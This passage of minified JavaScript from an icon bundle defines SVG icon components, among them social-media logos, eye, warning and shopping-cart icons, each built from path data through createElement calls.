0-2h8Z"})),mobile_smartphone_phone_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 22.75A2.75 2.75 0 0 0 19.75 20V4A2.75 2.75 0 0 0 17 1.25H7A2.75 2.75 0 0 0 4.25 4v16A2.75 2.75 0 0 0 7 22.75h10ZM13.5 4a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"})),pause_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.25 5A2.75 2.75 0 0 1 5 2.25h2.5A2.75 2.75 0 0 1 10.25 5v14a2.75 2.75 0 0 1-2.75 2.75H5A2.75 2.75 0 0 1 2.25 19V5Zm11.5 0a2.75 2.75 0 0 1 2.75-2.75H19A2.75 2.75 0 0 1 21.75 5v14A2.75 2.75 0 0 1 19 21.75h-2.5A2.75 2.75 0 0 1 13.75 19V5Z",clipRule:"evenodd"})),pinterest_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 4.554 2.833 8.448 6.832 10.014-.094-.85-.178-2.159.038-3.087.195-.84 1.26-5.344 1.26-5.344s-.321-.644-.321-1.596c0-1.495.866-2.61 1.945-2.61.917 0 1.36.688 1.36 1.514 0 .922-.587 2.301-.89 3.579-.254 1.07.536 1.943 1.592 1.943 1.91 0 3.379-2.015 3.379-4.923 0-2.574-1.85-4.374-4.49-4.374-3.06 0-4.855 2.295-4.855 4.665 0 .925.356 1.915.8 2.454.088.106.101.2.075.308-.082.34-.263 1.07-.298 1.22-.047.196-.156.238-.36.143-1.343-.625-2.182-2.588-2.182-4.165 0-3.39 2.464-6.505 7.103-6.505 3.729 0 6.627 2.657 6.627 6.209 0 3.705-2.336 6.686-5.578 6.686-1.09 0-2.114-.566-2.464-1.234 0 0-.54 2.053-.67 2.555-.243.934-.898 2.105-1.336 2.819A10.76 10.76 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Z"})),play_media_video_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.936 0 10.75-4.813 10.75-10.75S17.936 1.25 12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75ZM10.416 7.376A.75.75 0 0 0 9.25 8v8a.75.75 0 0 0 1.166.624l6-4a.75.75 0 0 0 0-1.248l-6-4Z",clipRule:"evenodd"})),price_tag_label_category_sale_discount_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.444 13.616a2.75 2.75 0 0 0 .806-1.944V3.5a1.75 1.75 0 0 0-1.75-1.75h-8.172c-.73 0-1.429.29-1.945.806l-8 8a2.75 2.75 0 0 0 0 3.888l7.172 7.172a2.75 2.75 0 0 0 3.889 0l8-8ZM8.707 12.293a1 1 0 1 0-1.414 1.414l3 3 .076.068a1 1 0 0 0 1.406-1.406l-.068-.076-3-3ZM18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),price_tag_offer_sale_coupon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18.796 6.963c-.367 1.048-1.172 1.993-2.432 2.693a.75.75 0 1 1-.728-1.311c.99-.55 1.517-1.229 1.744-1.878a2.583 2.583 0 0 0-.1-1.941c-.55-1.208-1.999-2.11-3.853-1.618-2.791.74-6.15 1.333-9.695-.024a.75.75 0 1 1 .536-1.401c3.09 1.183 6.062.695 8.774-.025 2.566-.68 4.75.577 5.603 2.445.425.933.517 2.017.151 3.06Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.74 7.294c-.46 1.313-1.45 2.436-2.89 3.236a1.75 1.75 0 1 1-1.7-3.06c.81-.45 1.152-.95 1.286-1.333a1.59 1.59 0 0 0-.066-1.197 1.835 1.835 0 0 0-.101-.19h-4.44c-.73 0-1.43.29-1.945.805l-6.5 6.5a2.75 2.75 0 0 0 0 3.89l6.171 6.171a2.75 2.75 0 0 0 3.89 0l6.5-6.5a2.75 2.75 0 0 0 .805-1.944V6.5c0-.598-.3-1.127-.759-1.442.083.73.01 1.49-.252 2.236Zm-8.71 5.176a.75.75 0 0 0-1.06 1.06l2 2a.75.75 0 0 0 1.06-1.06l-2-2Zm-2.5 1.5a.75.75 0 0 0-1.06 1.06l3 3a.75.75 0 0 0 1.06-1.06l-3-3Z",clipRule:"evenodd"})),reddit_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M13.875 4.75h2.354a2.751 2.751 0 1 0 0-1.5h-2.354A2.75 2.75 0 0 0 11.125 6v2.028c-1.76.115-3.39.571-4.771 1.281a2.875 2.875 0 1 0-3.964 4.109A5.777 5.777 0 0 0 2 15.5C2 19.642 6.477 23 12 23s10-3.358 10-7.5c0-.722-.136-1.421-.39-2.082a2.875 2.875 0 1 0-3.963-4.109C16.2 8.566 14.48 8.1 12.624 8.014V6c0-.69.56-1.25 1.25-1.25ZM9 14.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm0 2.97a.75.75 0 0 0-1.06 1.06c.954.955 2.57 1.345 4.03 1.345 1.46 0 3.075-.39 4.03-1.345a.75.75 0 0 0-1.06-1.06c-.546.545-1.68.905-2.97.905-1.29 0-2.424-.36-2.97-.905ZM16.5 13a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z",clipRule:"evenodd"})),refresh_reset_cycle_loop_infinity_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 21v-5a1 1 0 0 1 1-1h5a1 1 0 1 1 0 2H5.756A7.977 7.977 0 0 0 12 20a8 8 0 0 0 8-8 1 1 0 1 1 2 0c0 5.523-4.477 10-10 10a9.967 9.967 0 0 1-7-2.863V21a1 1 0 1 1-2 0Zm-1-9C2 6.477 6.477 2 12 2a9.966 9.966 0 0 1 7 2.86V3a1 1 0 1 1 2 0v5a1 1 0 0 1-1 1h-5a1 1 0 1 1 0-2h3.245A8 8 0 0 0 4 12a1 1 0 1 1-2 0Z"})),restriction_no_stop_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM6.383 19.03A9 9 0 0 0 19.03 6.383L6.383 19.03ZM12 3a9 9 0 0 0-7.031 14.616L17.616 4.97A8.96 8.96 0 0 0 12 3Z",clipRule:"evenodd"})),right_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18Zm0 18a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Zm0-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18Zm0-6a1 1 0 1 1 0 2h-8a1 1 0 1 1 0-2h8Z"})),right_triangle_angle_play_arrow_forward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.25 5c0-1.442 1.646-2.265 2.8-1.4l9.334 7c.933.7.933 2.1 0 2.8l-9.334 7c-1.154.865-2.8.042-2.8-1.4V5Z"})),search_magnify_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M16.618 18.032a9 9 0 1 1 1.414-1.414l3.675 3.675a1 1 0 0 1-1.414 1.414l-3.675-3.675ZM4 11a7 7 0 1 1 12.042 4.856 1.006 1.006 0 0 0-.186.186A7 7 0 0 1 4 11Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M10 6.5a1 1 0 0 1 1-1 5.5 5.5 0 0 1 5.5 5.5 1 1 0 1 1-2 0A3.5 3.5 0 0 0 11 7.5a1 1 0 0 1-1-1Z",clipRule:"evenodd"})),settings_tool_function_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.183 2.612a1.75 1.75 0 0 0-1.706-1.362h-2.953a1.75 1.75 0 0 0-1.706 1.362l-.355 1.562a1.25 1.25 0 0 1-1.587.918L5.25 4.59a1.75 1.75 0 0 0-2.021.782L1.772 7.837a1.75 1.75 0 0 0 .338 2.193l1.16 1.04a1.25 1.25 0 0 1 0 1.862L2.11 13.97a1.75 1.75 0 0 0-.337 2.193l1.455 2.464a1.751 1.751 0 0 0 2.021.783l1.628-.5a1.25 1.25 0 0 1 1.586.917l.355 1.56a1.75 1.75 0 0 0 1.707 1.363h2.952a1.75 1.75 0 0 0 1.706-1.362l.355-1.56a1.25 1.25 0 0 1 1.586-.919l1.628.501a1.75 1.75 0 0 0 2.02-.783l1.457-2.464a1.75 1.75 0 0 0-.34-2.193l-1.157-1.038a1.25 1.25 0 0 1 0-1.863l1.159-1.039a1.75 1.75 0 0 0 .338-2.193l-1.456-2.464a1.75 1.75 0 0 0-2.02-.782l-1.629.5a1.25 1.25 0 0 1-1.586-.917l-.355-1.562ZM15 12a3 3 0 1 1-6 0 3 3 0 0 1 6 0Z",clipRule:"evenodd"})),share_social_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m9.075 9.42 5.865-2.933a3.45 3.45 0 1 1 1.005 1.734l-5.976 2.988a3.915 3.915 0 0 1 0 1.583l5.976 2.987a3.45 3.45 0 1 1-1.005 1.734L9.074 14.58a3.9 3.9 0 1 1 0-5.16Z",clipRule:"evenodd"})),shopping_cart_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9.75 19.25a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm9.75 0a1 1 0 1 0-2 0 1 1 0 0 0 2 0Zm1.5 0a2.5 2.5 0 1 1-4.79-1h-5.17a2.5 2.5 0 1 1-4.33-.442 1.745 1.745 0 0 1-.572-1.069L4.376 3.966a.25.25 0 0 0-.247-.216H2a.75.75 0 0 1 0-1.5h2.129a1.75 1.75 0 0 1 1.733 1.51l.068.49h14.874a1.75 1.75 0 0 1 1.722 2.06l-1.152 6.403a1.75 1.75 0 0 1-1.572 1.434l-12.36 1.067.182 1.32a.25.25 0 0 0 .247.216H18.5a2.5 2.5 0 0 1 2.5 2.5Z"})),skype_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M7.5 1.25a6.25 6.25 0 0 0-5.197 9.723 9.75 9.75 0 0 0 10.724 10.724 6.25 6.25 0 0 0 8.67-8.67A9.75 9.75 0 0 0 10.973 2.303 6.224 6.224 0 0 0 7.5 1.25Zm4.5 6C9.8 7.25 8.25 8.4 8.25 10c0 1.015.647 1.627 1.337 1.991.644.34 1.468.546 2.178.723l.053.014c.778.194 1.429.361 1.894.607.435.23.538.43.538.665 0 .4-.45 1.25-2.25 1.25S9.75 14.4 9.75 14a.75.75 0 0 0-1.5 0c0 1.6 1.55 2.75 3.75 2.75s3.75-1.15 3.75-2.75c0-1.015-.647-1.627-1.337-1.991-.644-.34-1.468-.546-2.178-.723l-.053-.014c-.778-.194-1.429-.361-1.894-.607-.435-.23-.538-.43-.538-.665 0-.4.45-1.25 2.25-1.25s2.25.85 2.25 1.25a.75.75 0 0 0 1.5 0c0-1.6-1.55-2.75-3.75-2.75Z",clipRule:"evenodd"})),smile_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7.5a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1V10a1 1 0 1 1-2 0V8.5a1 1 0 0 1 1-1Zm-7.556 6.275a.75.75 0 1 0-1.43.45 5.752 5.752 0 0 0 10.973 0 .75.75 0 1 0-1.431-.45 4.252 4.252 0 0 1-8.112 0Z",clipRule:"evenodd"})),social_community_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.75a3.384 3.384 0 0 1 3.238 2.408C18.858 5.46 21.4 8.895 21.4 13c0 .506-.039 1.002-.113 1.486a3.388 3.388 0 0 1 1.463 2.791 3.386 3.386 0 0 1-4.785 3.085A9.3 9.3 0 0 1 12 22.5a9.302 9.302 0 0 1-5.965-2.138 3.386 3.386 0 0 1-4.785-3.085c0-1.156.579-2.179 1.463-2.79A9.77 9.77 0 0 1 2.6 13c0-4.105 2.543-7.54 6.162-8.841A3.384 3.384 0 0 1 12 1.75ZM19.4 13c0-2.998-1.707-5.533-4.22-6.704A3.383 3.383 0 0 1 12 8.527a3.383 3.383 0 0 1-3.18-2.231C6.307 7.467 4.6 10.002 4.6 13c0 .301.017.598.05.889a3.385 3.385 0 0 1 3.363 3.388c0 .63-.172 1.221-.471 1.727A7.322 7.322 0 0 0 12 20.5a7.321 7.321 0 0 0 4.458-1.495 3.384 3.384 0 0 1-.47-1.728 3.385 3.385 0 0 1 3.361-3.388c.034-.291.05-.588.05-.889Z",clipRule:"evenodd"})),square_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19V5A2.75 2.75 0 0 1 5 2.25h14A2.75 2.75 0 0 1 21.75 5v14Z"})),star_rating_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10.3 2.793c.67-1.443 2.73-1.443 3.4 0l2.136 4.602a.294.294 0 0 0 .232.166l5.068.596c1.578.186 2.232 2.136 1.05 3.222l-3.748 3.444a.28.28 0 0 0-.087.261l.995 4.975c.315 1.574-1.369 2.76-2.75 1.99l-4.45-2.474a.3.3 0 0 0-.291 0l-4.45 2.475c-1.382.768-3.065-.417-2.75-1.991l.995-4.975a.28.28 0 0 0-.087-.26l-3.748-3.445c-1.182-1.086-.529-3.036 1.05-3.222l5.067-.596a.293.293 0 0 0 .232-.166L10.3 2.793Z"})),stopwatch_reading_time_timer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15 1.5a1 1 0 0 0-1-1h-4a1 1 0 1 0 0 2h1v.8c-4.915.502-8.75 4.653-8.75 9.7 0 5.385 4.365 9.75 9.75 9.75s9.75-4.365 9.75-9.75c0-5.047-3.835-9.198-8.75-9.7v-.8h1a1 1 0 0 0 1-1Zm-4 6a1 1 0 1 1 2 0v4.985l3.081 2.202.08.063a1 1 0 0 1-1.156 1.62l-.086-.056-3.5-2.5A1 1 0 0 1 11 13V7.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M18.293 3.293a1 1 0 0 1 1.414 0l2 2 .068.076a1 1 0 0 1-1.406 1.406l-.076-.068-2-2a1 1 0 0 1 0-1.414Z"})),tablet_ipad_pad_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M18 22.75A2.75 2.75 0 0 0 20.75 20V4A2.75 2.75 0 0 0 18 1.25H6A2.75 2.75 0 0 0 3.25 4v16A2.75 2.75 0 0 0 6 22.75h12ZM12.01 4a1 1 0 1 1 0 2C11.457 6 11 5.552 11 5s.457-1 1.01-1Z",clipRule:"evenodd"})),tag_bookmark_save_favourite_mark_discount_solid_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M20.75 22a.75.75 0 0 1-1.2.6l-6.8-5.1a1.25 1.25 0 0 0-1.415-.059l-.085.059-6.8 5.1a.75.75 0 0 1-1.2-.6V4A2.75 2.75 0 0 1 6 1.25h12A2.75 2.75 0 0 1 20.75 4v18Z"})),tiktok_logo_icon_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm2.364 5.25a1 1 0 1 0-2 0v7.792a2.195 2.195 0 0 1-2.182 2.208A2.195 2.195 0 0 1 8 14.292c0-1.228.985-2.209 2.182-2.209a1 1 0 1 0 0-2C7.864 10.083 6 11.975 6 14.292c0 2.316 1.864 4.208 4.182 4.208 2.317 0 4.182-1.892 4.182-4.208V9.934a4.74 4.74 0 0 0 2.636.774 1 1 0 1 0 0-2c-1.713 0-2.636-1.377-2.636-2.208Z",clipRule:"evenodd"})),tiktok_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19 21.75A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14ZM6 14.292c0-2.316 1.864-4.209 4.182-4.209a1 1 0 0 1 0 2c-1.197 0-2.182.982-2.182 2.209s.985 2.208 2.182 2.208 2.181-.98 2.181-2.208V6.5a1 1 0 0 1 2 0c0 .83.924 2.208 2.637 2.208a1 1 0 0 1 0 2 4.738 4.738 0 0 1-2.637-.776v4.36c0 2.316-1.864 4.208-4.181 4.208C7.864 18.5 6 16.608 6 14.292Z",clipRule:"evenodd"})),triangle_rounded_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632Z",clipRule:"evenodd"})),triangle_shape_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 2.25a.75.75 0 0 1 .646.37l10 17A.75.75 0 0 1 22 20.75H2a.75.75 0 0 1-.646-1.13l10-17A.75.75 0 0 1 12 2.25Z",clipRule:"evenodd"})),twitter_x_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.292 2.293a1.001 1.001 0 0 1 1.415 1.414l-7.125 7.124 7.026 9.73A.751.751 0 0 1 21 21.75h-5a.751.751 0 0 1-.608-.311l-4.789-6.63-6.896 6.897a1 1 0 0 1-1.414-1.415l7.124-7.125L2.392 3.44A.751.751 0 0 1 3 2.25h5l.09.005a.751.751 0 0 1 .518.306l4.787 6.628 6.897-6.896Z",clipRule:"evenodd"})),upload_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 12.47a.75.75 0 0 1 1.06 0l2.5 2.5a.75.75 0 0 1-.53 1.28h-1.75V21a.75.75 0 0 1-1.5 0v-4.75H9.5a.75.75 0 0 1-.53-1.28l2.5-2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.67 11.663-.015-.03-.032-.06-.007-.013a18.339 18.339 0 0 0-.72-1.217 20.43 20.43 0 0 0-2.224-2.856C18.733 5.42 15.799 3.25 12 3.25c-3.8 0-6.734 2.17-8.672 4.237a20.43 20.43 0 0 0-2.796 3.801 11.69 11.69 0 0 0-.149.272l-.007.014-.032.06-.015.03a.76.76 0 0 0 0 .673l.015.03.032.06.007.013a18.262 18.262 0 0 0 .72 1.217 20.432 20.432 0 0 0 2.225 2.856C5.266 18.58 8.2 20.75 12 20.75c3.8 0 6.733-2.17 8.672-4.237a20.433 20.433 0 0 0 2.795-3.801c.065-.115.115-.208.149-.272l.007-.013.02-.037.012-.024.015-.03a.756.756 0 0 0 0-.673ZM12 5.75a4.25 4.25 0 1 1 0 8.5 4.25 4.25 0 0 1 0-8.5Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"m.33 11.664.015-.03.032-.06.007-.014a18.263 18.263 0 0 1 .72-1.217 20.43 20.43 0 0 1 2.224-2.856C5.268 5.42 8.201 3.25 12 3.25c3.8 0 6.734 2.17 8.672 4.237a20.425 20.425 0 0 1 2.796 3.801c.065.115.115.208.149.272l.007.014.032.06.014.03a.75.75 0 0 1 .001.672l-.015.03a5.739 5.739 0 0 1-.032.06l-.007.014a18.252 18.252 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.225 2.856C18.734 18.58 15.8 20.75 12 20.75c-3.8 0-6.733-2.17-8.671-4.237a20.432 20.432 0 0 1-2.796-3.801 12.06 12.06 0 0 1-.149-.272l-.007-.013-.032-.06-.015-.03a.756.756 0 0 1 0-.673ZM15.75 12a3.75 3.75 0 1 1-7.5 0 3.75 3.75 0 0 1 7.5 0Z",clipRule:"evenodd"})),view_count_show_visible_eye_open_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M23.616 11.573C20.503 7.077 16.29 4.75 12 4.75c-4.291 0-8.504 2.327-11.617 6.823a.75.75 0 0 0 0 .854C3.496 16.922 7.71 19.25 12 19.25c4.29 0 8.503-2.328 11.616-6.823a.75.75 0 0 0 0-.854ZM17.25 12a5.25 5.25 0 1 0-10.5 0 5.25 5.25 0 0 0 10.5 0Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.25 12A2.25 2.25 0 0 0 12 9.75a.75.75 0 0 1 0-1.5A3.75 3.75 0 0 1 15.75 12a.75.75 0 0 1-1.5 0Z"})),view_count_show_visible_eye_open_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M14.25 10a1.75 1.75 0 0 0 3.366.673l.049-.098a.751.751 0 0 1 1.318.06 7.75 7.75 0 1 1-3.62-3.62.75.75 0 0 1-.036 1.369A1.751 1.751 0 0 0 14.25 10Z"}),(0,a.createElement)("path",{d:"M12 2c4.335 0 8.706 2.263 10.89 6.546a1 1 0 1 1-1.78.908C19.301 5.911 15.664 4 12 4 8.335 4 4.698 5.911 2.89 9.454a1 1 0 0 1-1.78-.908C3.293 4.263 7.664 2 12 2Z"})),view_count_show_visible_eye_open_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M16.75 12H12V7.25A4.75 4.75 0 1 0 16.75 12Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"m23.167 12.083.727.364c.141-.281.14-.613 0-.895l-.002-.003-.003-.007-.011-.022a10.615 10.615 0 0 0-.192-.354 20.675 20.675 0 0 0-2.831-3.85C18.895 5.226 15.899 3 12 3 8.1 3 5.104 5.226 3.145 7.316a20.674 20.674 0 0 0-2.831 3.85 12.375 12.375 0 0 0-.192.354l-.011.022-.003.007-.002.002s0 .002.894.449l-.894-.447a1 1 0 0 0 0 .894l.002.004.003.007.011.022a8.267 8.267 0 0 0 .192.354 20.67 20.67 0 0 0 2.831 3.85C5.105 18.774 8.1 21 12 21c3.9 0 6.895-2.226 8.855-4.316a20.672 20.672 0 0 0 2.831-3.85 11.81 11.81 0 0 0 .175-.322l.017-.032.011-.022.003-.007.002-.002s0-.002-.727-.366Zm-.096-.119.823-.412-.823.412ZM12 5a7 7 0 1 0 0 14 7 7 0 0 0 0-14Z",clipRule:"evenodd"})),warning_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM13 8a1 1 0 1 0-2 0v4a1 1 0 1 0 2 0V8Zm-1 6.75a1.25 1.25 0 1 0 0 2.5 1.25 1.25 0 0 0 0-2.5Z",clipRule:"evenodd"})),warning_triangle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M9.623 3.632c1.054-1.842 3.7-1.842 4.754 0l8.006 13.997c1.046 1.828-.263 4.121-2.377 4.121H3.994c-2.113 0-3.422-2.293-2.377-4.121L9.623 3.632ZM11 9v4a1 1 0 1 0 2 0V9a1 1 0 1 0-2 0Zm0 7.5v.5a1 1 0 1 0 2 0v-.5a1 1 0 1 0-2 0Z",clipRule:"evenodd"})),whatsapp_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12c0 1.802.444 3.501 1.228 4.994l-1.206 4.824a.75.75 0 0 0 .91.91l4.824-1.206A10.706 10.706 0 0 0 12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25Zm3.16 12.04c.245.09 1.56.733 1.828.866v.001l.145.071c.187.09.313.151.367.24.067.111.067.645-.156 1.266-.223.622-1.292 1.19-1.805 1.266-.461.069-1.044.097-1.685-.106a15.383 15.383 0 0 1-1.525-.56c-2.506-1.078-4.2-3.495-4.522-3.954l-.047-.066-.002-.002c-.14-.186-1.09-1.447-1.09-2.752 0-1.226.605-1.87.883-2.165l.053-.056a.984.984 0 0 1 .713-.333c.179 0 .357.002.513.01h.06c.156 0 .35-.001.541.456.078.185.193.463.313.753.225.547.469 1.137.512 1.224.067.133.112.288.022.466l-.039.08a1.49 1.49 0 0 1-.228.364l-.14.166c-.09.111-.182.222-.261.3-.134.133-.273.277-.117.544.156.266.692 1.138 1.488 1.844a6.905 6.905 0 0 0 1.973 1.241c.074.032.134.058.178.08.267.133.423.111.58-.067.155-.177.668-.777.846-1.043.178-.267.357-.223.602-.134Z",clipRule:"evenodd"})),wordpress_logo_icon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.778 12a9.225 9.225 0 0 0 5.198 8.3l-4.4-12.054A9.18 9.18 0 0 0 2.779 